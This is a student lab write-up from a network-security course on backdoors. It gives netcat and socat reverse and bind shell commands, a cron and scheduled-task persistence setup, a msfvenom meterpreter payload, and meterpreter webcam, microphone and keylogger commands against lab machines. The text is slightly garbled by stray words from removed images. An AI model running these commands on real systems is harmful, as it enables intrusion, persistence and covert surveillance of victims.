2018-2019-2 20165235《網絡對抗技術》Exp2 後門原理與實踐

時間 2019-12-12

原文原文鏈接

2018-2019-2 20165235《網絡對抗技術》Exp2 後門原理與實踐

實驗內容

1.使用netcat獲取主機操做Shell，cron啓動
2.使用socat獲取主機操做Shell, 任務計劃啓動
3.使用MSF meterpreter（或其餘軟件）生成可執行文件，利用ncat或socat傳送到主機並運行獲取主機Shell
4.使用MSF meterpreter（或其餘軟件）生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容，並嘗試提權linux

基礎問題

例舉你能想到的一個後門進入到你係統中的可能方式？
答：收到以銀行或者學校名義給你發過來的虛假郵件，打開郵件而且下載郵件的附件以後，後門程序可能會進入你的計算機。
例舉你知道的後門如何啓動起來(win及linux)的方式？
答：經過修改註冊表設置爲開機自啓動；進入掛馬網站；下載一些有惡意程序綁定的軟件。
Meterpreter有哪些給你映像深入的功能？
答：能夠不用經過用戶登陸來訪問計算機，而且隨意進行開啓攝像頭，錄製音頻等操做。
如何發現本身有系統有沒有被安裝後門？
答：1.首先必須開啓防火牆，並且防火牆對與某些危險操做的提示要仔細查看，不能疏忽。2.能夠下載專業的殺毒軟件(不要下載一些流氓軟件如360)，進行按期檢查電腦。3.能夠檢測某些不經常使用的端口是否長時間開啓，若是長時間開啓說明電腦有必定的概率被植入了後門或者是病毒。web

實驗過程

1.使用netcat獲取主機操做Shell，cron啓動

1.windows下得到一個linux shell

1.在Linux中使用ifconfig查看Linux的ip地址
shell

2.在Windows中使用ipconfig查看本機ip地址

3.windows打開監聽：ncat.exe -l -p 5235，Linux反彈鏈接win：nc 192.168.1.101 5235 -e /bin/sh，而且在Windows cmd下使用ls命令查看是否成功。
windows

2.Linux 下得到Windows的cmd程序

1.Linux運行監聽指令：nc -l -p 5235，Windows反彈鏈接Linux：ncat.exe -e cmd.exe 192.168.245.128 5235，在Linux shell下使用dir命令。

安全

3.在Linux與Windows之間進行數據傳送

1.Windows下監聽端口：ncat.exe -l -p 5235，,Linux下鏈接到Windows的端口：ncat 192.168.1.101 5235，創建鏈接以後，就能夠傳輸數據：
網絡

2.使用socat獲取主機操做Shell, 任務計劃啓動

1.使用netcat獲取主機操做Shell，cron啓動

1.Windows中使用ncat.exe -l 5235監聽5235端口
2.在linux中，使用crontab -e指令編輯一條定時任務，選擇編輯器時選擇3，在底行插入57 * * * * /bin/netcat 192.168.1.101 5235 -e /bin/sh（每一個小時的第57分鐘反向鏈接Windows的5235端口）

3.:wq保存退出配置即生效，可經過crontab -l查看：

4.在系統時間到57分鐘，就會在Windows中監聽的cmd中發現得到了Linux shell
tcp

2.使用`socat`獲取主機操做Shell, 任務計劃啓動

1.win7系統中鼠標右擊計算機：計算機管理->系統工具->任務計劃程序->建立任務
編輯器

2.常規中填寫任務名稱如：20165235。

3.觸發器-新建新建觸發器，（按照圖中步驟進行）
工具

4.點擊操做，將2操做所指的改成 啓動程序.
學習

5.導入socat.exe的路徑，並添加參數：tcp-listen:5235 exec:cmd.exe,pty,stderr(把cmd.exe綁定到端口5235，同時把cmd.exe的stderr重定向到stdout上)

6.建立完成以後，按Windows+L快捷鍵鎖定計算機，再次打開，運行以前建立的任務。

7.在Linux shell中輸入socat - tcp:192.168.1.101:5235：

3.使用MSF meterpreter（或其餘軟件）生成可執行文件，利用ncat或socat傳送到主機並運行獲取主機Shell

1.在kali中輸入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.245.128 LPORT=5235 -f exe > 20165235_backdoor.exe,生成後門程序20165235_backdoor.exe

2.在Windows中使用ncat.exe -lv5235 > 20165235_backdoor.exe

3.Linux中輸入nc 192.168.1.101 5235 < 20165235_backdoor.exe。傳輸成功而且在Windows的ncat文件夾下查看後門程序。

4.再打開新的shell，而且使用msfconsole進入msf控制檯：

5.輸入use exploit/multi/handler：
6.使用和生成後門程序時相同的payload：set payload windows/meterpreter/reverse_tcp：
7.設置ip：set LHOST 192.168.245.128
9.設置端口：set LPORT 5235
10.使用exploit開始監聽
11.在Windows cmd 中相應文件夾中執行：20165235_backdoor.exe，Linux得到Windows主機的鏈接，而且獲得了遠程控制的shell：

4.使用MSF meterpreter（或其餘軟件）生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容，並嘗試提權

1.在以上的操做之上，使用record_mic能夠截獲一段音頻：

2.使用webcam_snap可使用攝像頭拍照：

3.使用creenshot能夠進行截屏：

4.使用keyscan_start 記錄下擊鍵的過程，使用keyscan_dump讀取擊鍵的記錄：

實驗中遇到的問題

1.錯誤一：在進行第一個實驗時出現以下錯誤：

解決方法：在Linux使用ifconfig時出現不少地址，我很隨意的填上去了一個，通過我仔細查看，將192.168.245.130寫入運行成功。

2.錯誤：在使用`crontab -e`指令編輯一條定時任務時，發現win7端沒有監聽到Linux的shell

解決方法：由於在底部加入指令時沒有將#取除掉。

實驗總結與體會

經過本次實驗我首先明白了什麼是後門。（後門程序通常是指那些繞過安全性控制而獲取對程序或系統訪問權的程序方法）。同時也學會了後門的基本原理，按照學長學姐以及同窗的博客的指導下完成實驗，學會了使用多種後門工具，同時也學會了如何防範別人對計算機的後門植入。在之後的學習生活中要注意網上安全，留意惡意程序。本此實驗也有必定的趣味性，在完成後門植入後會有些許的成就感。